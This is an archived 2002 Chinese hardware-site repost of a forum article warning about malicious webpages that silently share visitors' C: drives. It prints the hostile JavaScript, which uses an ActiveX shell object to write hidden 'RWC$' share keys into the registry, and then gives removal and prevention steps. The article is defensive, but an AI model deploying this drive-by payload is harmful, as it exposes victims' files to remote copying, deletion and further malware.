关于我们|广告服务|联系我们|您的建议

 
添入收藏夹 业界动态 今日行情 硬件评测 最新报价 主题论坛 精品商城 外地市场 硬件文章 新品Show

: 文章分类
: 配件
  • CPU
  • 内存
  • 硬盘
  • 主板
  • 声卡
  • 网卡
  • 音箱
  • 光驱
  • 机箱
  • 电源
  • 风扇
  • 键盘
  • 鼠标
  • 显示卡
  • Modem
  • 显示器
  • 8 外设
  • HUB
  • 耗材
  • 刻录机
  • 打印机
  • 扫描仪
  • 摄像头
  • 路由器
  • 交换机
  • 数码相机
  • 移动存储
  • MP3
  • < 其他
  • 手机
  • 家电
  • PDA
  • PALM
  • 笔记本
  • 小熊在线硬件文章

    关键词
    类别

    论坛精华:向修改IE浏览器网站开火

    【本站论坛精华】阅读 人次
    2002年01月05日13:10


    【文章简介】
    论坛精华:向修改IE浏览器网站开火... (2487 字)

    • 向修改IE浏览器网站开火 背黑锅(16704)于2001/12/18(17:34:48)..

    • 现在上网真是不安全,前一阵子闹得最凶的是“万花谷”,如果进入该网页浏览者注册表会被修改,好多系统功能因此受到限制。最近又听说有网友在浏览网页时硬盘被共享,危害似乎更大!
        其实,所谓的浏览网页硬盘被共享,和“万花谷”一样,受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。以下是该网页原代码中的关键部分:
      script language=JavaScript
      document.write("");
      function f(){
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
      Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
      );
      Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
      \\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
      );
      Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
      LanMan\\RWC$\\Path","C:\\"
      );
      }
      function init()
      {
      setTimeout("f()", 1000);
      }
      init();
      /script
        注意:以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加键值“RWC$” ,在RWC$”下又分别建立键值“Flags”、“Type”“Path”,这样就把c盘设为共享了,共享名为RWC$。而且你在网络属性中还看不到硬盘被共享了!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬盘被共享。
        由于只要浏览这类网页硬盘即被共享,因此其危害较之木马更大(个人观点)。如果不小心中招,那么给你下套的人完全可以把你的硬盘当做他的一个逻辑硬盘,他可以在你电脑中随意拷贝文件,删除文件,给文件改名……如果这样还不能令他满意,他完全可以给你再下个木马(哦,错了!不是一个、是一群木马),那样你就生不如死了,什么秘密都没有了:上网账号、QQ密码、给MM的信件……如果他高兴还可以格式化你的硬盘,或者是在你的电脑中运行“江民炸弹”之类的软件破坏你的硬盘。总之,你的一切都在他的掌握之下了,想想够可怕了吧?
        解决办法:把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“RWC$”删掉。狠一点的,也可以把windows\system\下面的Vserver.vxd(Microsoft 网络上的文件与打印机共享,虚拟设备驱动程序)删掉,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉,永绝这类“木马”的后路吧。
        防御防范:
        1、不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。
        2、运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别,把安全极别由“中”改为“高”
        3、由于该类网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。具体方法是:在IE窗口中点击“工具→Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。唉,有利就有弊,你还是自己看着办吧。
        4、对于Windows98用户,请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。请放心,删除这个组件不会影响到你正常浏览网页的。
        5、既然这类网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!
        加锁方法如下:
        (1)运行注册表编辑器regedit.exe;
        (2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。
        解锁方法如下:
        用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:
      REGEDIT4
      [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
      "DisableRegistryTools"=dword:00000000
        存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!
        6、安装网络防火墙,特别是安装了Norton2001后,进入该类网页就会报警提示有脚本写注册表,国产反病毒软件KVW3000也有此类功效,建议你也安装一个这样的软件。
        7、虽然经过一番辛苦的劳动修改回了标题和默认连接首页,但如果以后又不小心进入该站就又得麻烦一次。其实,你可以在IE中做一些设置以便永远不进该站点:
      打开IE,点击“工具”→“Internet选项”→“内容”→“分级审查”,点“启用”按钮,会调出“分级审查”对话框,然后点击“许可站点”标签,输入不想去的网站网址,如输入:http://www.sohu8.com,按“从不”按钮,再点击“确定”即大功告成!

    欢迎大家来电脑安全论坛讨论!

    【作者:*小熊在线论坛精华* 北京】  版权作品 未经许可 请勿转载

    以前的调查

    好友地址*   您的邮箱
    您的附言
        

    网友评论(仅供参考与本站立场无关)
    即刻发表你对本文的意见和看法(1000字以内)

    ◇产品介绍相关主题                更多相关主题看这里...


    论坛精华:和妖魔大战三百回合,nVIIDA投降与黑客和解 Hot! 2002.01.05 *小熊在线论坛精华*
    论坛精华:唐僧——天下最早的黑客 Hot! 2002.01.05 *小熊在线论坛精华*
    论坛精华:关于液晶显示器的选购 Hot! 2002.01.02 *小熊在线论坛精华*
    论坛精华:STUDIODV和会声会影5的区别 Hot! 2002.01.02 *小熊在线论坛精华*
    看看PC115E配FM91电池的样子 2002.01.03 小熊在线论坛精华
    给想买二手显示器的朋友说说要点 2002.01.03 小熊在线论坛精华
    论坛精华:PC115E购机经验 Hot! 2002.01.01 *小熊在线论坛精华*
    论坛精华:买显示器一波三折记 Hot! 2002.01.01 *小熊在线论坛精华*

    J 硬件评测鼎力推荐               更多相关主题看这里...

    自己动手做个转接线 Cool! 2001.12.29 小熊在线山东-大山
    价值千金——联志“美女”机箱 Cool! 2001.12.28 小熊在线-笨笨熊
    主流市场的讯号---精英I845D芯片组主板p4vxad测试 Cool! 2001.12.28 小熊在线-overload
    SerialATA,ATA133别让情两难――迈拓D740X-6L测试手记(下) Cool! 2001.12.25 小熊在线-Sky
    SerialATA ,ATA133别让情两难――迈拓D740X-6L测试手记 Cool! 2001.12.24 小熊在线-Sky
    散热王位之争-TypeW散热器测试 Cool! 2001.12.23 小熊在线福建-拳头
    结合MP3等多项功能的Fuji30i数码相机 Cool! 2001.12.22 小熊在线南京-阿狼
    决战---5款I845-D芯片组主板测试 Cool! 2001.12.19 小熊在线-Overload

    J 产品介绍鼎力推荐               更多相关主题看这里...

    低速硬盘的崛起--西数WD400EB硬盘测试 Cool! 2002.01.05 小熊在线福建-拳头
    “西部数据杯”第七届小熊DIY大赛获奖选手名单揭晓! Cool! 2002.01.03 *小熊在线*
    再探讨割开数据线的好处 Cool! 2001.12.31 张章,责编:张章
    2001年显卡导购篇 Cool! 2001.12.30 小熊在线-Sky
    VIA'Eden全透视---之走进Eden家族 Cool! 2001.12.25 冷星云 责编:ACWELL
    实施鼠标亮化工程!——改造鼠标增加蓝色魅力 Cool! 2001.12.21 张章,责编:张章
    ATI关于RADEON 8500 LE在大陆市场的声明 Cool! 2001.11.25 出处不明
    康柏ARMADA7370笔记本拆卸实录 Cool! 2001.11.21 小熊在线-Sky

    ◇硬件评测相关主题                更多相关主题看这里...


    博达IEEE1394外置光驱/硬盘盒使用手记(下) Cool! 2001.09.23 小熊在线-SKY
    博达IEEE1394外置光驱/硬盘盒使用手记(上) Cool! 2001.09.22 小熊在线-SKY
    论坛热点:关于DVD区码贴二 2001.08.26 *论坛精华*
    LifeView的一款内置电视卡“FlyVideo'98飞影电视通”评测 Cool! 2001.08.08 小熊在线-joyt
    MAXTOR--IEEE1394硬盘火热评测(下) Cool! 2001.04.13 小熊在线-OVERLOAD
    优派低价出击,加入纯平彩显之战——优派E70f评测 2001.04.12 小熊在线-UM
    MAXTOR--IEEE1394硬盘火热评测(上) Cool! 2001.04.11 小熊在线-OVERLOAD
    技嘉6vx7-1394主板--带火线(IEEE1394)的主板 Cool! 2001.04.01 小熊在线-OVERLOAD

    ◇市场行情相关主题                更多相关主题看这里...


    精英I-buddie便携式台式机发布会 Cool! 2001.12.26 作者:pcworks责编:歇会儿
    “蓝蜘蛛”来了! 2001.11.26 阿滋猫
    还是老样子的内存价格让人别扭,CPU、硬盘价格变化不大,三星显示器大降价,同样的IEEE 1394外置硬盘盒却有两个价钱 2001.04.13 小熊在线-MX
    迈拓IEEE1394接口的外置硬盘在武汉出现 2000.12.15 kxh

    ◇业界动态相关主题                更多相关主题看这里...


    飞翔的双翼:Kanie Type-Wing散热器 Cool! 2001.12.27
    酷似笔记本的便携PC I-Buddie基本配置 2001.12.25
    无线网络任遨游-Spark Cool! 2001.11.27
    IE6.0打印机制解析 2001.10.08
    VIA C3处理器登陆服务器市场 获美商Rauch Medien采用 2001.07.06
    移动存储小精灵—搬运工 2001.07.04
    优派显示器更贴心的服务保证——优派显示器保修期:一年变两年 2001.07.02
    优派液晶显示器再次调价(另附:胡锦鸟的故事) Cool! 2001.06.13

    小熊在线公司版权所有
    Copyright (C) 2001 beareyes.com
    All Rights Reserved